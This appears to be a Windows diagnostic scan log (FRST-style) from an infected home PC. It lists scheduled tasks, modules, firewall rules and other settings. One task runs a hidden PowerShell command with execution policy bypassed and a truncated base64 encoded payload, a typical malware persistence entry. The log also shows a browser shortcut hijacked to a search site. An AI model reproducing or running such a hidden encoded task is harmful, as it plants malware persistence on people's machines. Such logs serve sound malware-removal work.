Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - System32\Tasks\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9436 more characters).
Task: {F3AF02E3-81A9-485B-B1B6-519881BEBF51} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157

==================== Loaded Modules (Whitelisted) ==============

2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-29 19:32 - 2016-02-29 19:32 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022900\algo.dll
2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


There are 7870 more sites.


There are 7870 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts


There are 15468 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
DNS Servers: 82.163.143.171 - 82.163.142.173
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{D1348AB0-4C36-4E08-AEE7-833E635A6B76}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{7FC743AA-D733-419F-8042-A035AD45F3B5}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagionds.exe
FirewallRules: [{F5F95BD3-A35E-44EE-A112-E2F68B3D3A0A}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{112C8525-A869-473F-A5AE-968AEB8835F7}] => (Allow) D:\Steam\SteamApps\common\Contagion\contagion.exe
FirewallRules: [{20B0CC62-3200-4EEF-B0B7-37B644402890}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{EF08C331-87FB-4CC5-ACB3-8EE65B40BA62}] => (Allow) D:\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{BF9681B5-75E6-4BB8-A9E8-33A6536FD70F}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{D7D86F73-58B4-4297-BD11-31694ED9AAE0}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3.exe
FirewallRules: [{DD0DCF4C-E8E1-49DD-900A-DD6AC7BC5C3C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{CF01C627-5181-49F6-8E87-A4C0CBDD7CA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{7E20D8C2-63C2-4175-95E6-1343C3ECD0C6}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{491A2AED-C695-4F06-BA71-CB7838E9C4FF}] => (Allow) D:\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{5E2969A1-BE68-4265-A8FC-7097A7ECBB11}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{74E554AC-E08A-4335-B417-29987ADE8453}] => (Allow) D:\Steam\SteamApps\common\BattleNations\bin\battlenations.exe
FirewallRules: [{A03CA821-5944-4FD4-AA99-63D9A7D540E2}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{7D59F7B3-275B-4781-B5B3-F54F6611ABE6}] => (Allow) D:\Hearthstone\Hearthstone.exe
FirewallRules: [{A01AFC7A-FADD-4E17-B5C6-7189DE2CD1CE}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{700AEC12-F515-4E9F-AE1F-ACFE78622256}] => (Allow) D:\StarCraft II\StarCraft II.exe
FirewallRules: [{ABA0ADF7-7B84-4F79-85B1-13F0FF4024DE}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{6CF41658-1CD6-4500-AC43-A82F127ACABB}] => (Allow) D:\Diablo III\Diablo III.exe
FirewallRules: [{C2481D3E-C354-4753-BD12-A8F578C331BF}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{16888A73-5F47-429F-A727-2E2184704346}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{7CD9AF2C-6572-4973-B88A-D6A325B74B4F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{F9A7B398-94AE-45D6-8514-BEA802B1E5E2}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\dota.exe
FirewallRules: [{512EF9C6-D108-459F-8832-0603753D2F89}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B598ABAB-0FDC-43A9-BD15-FF9FF99D712C}] => (Allow) C:\Users\Kym\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E4955EAC-E367-495F-B0A4-89B8B7610B29}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
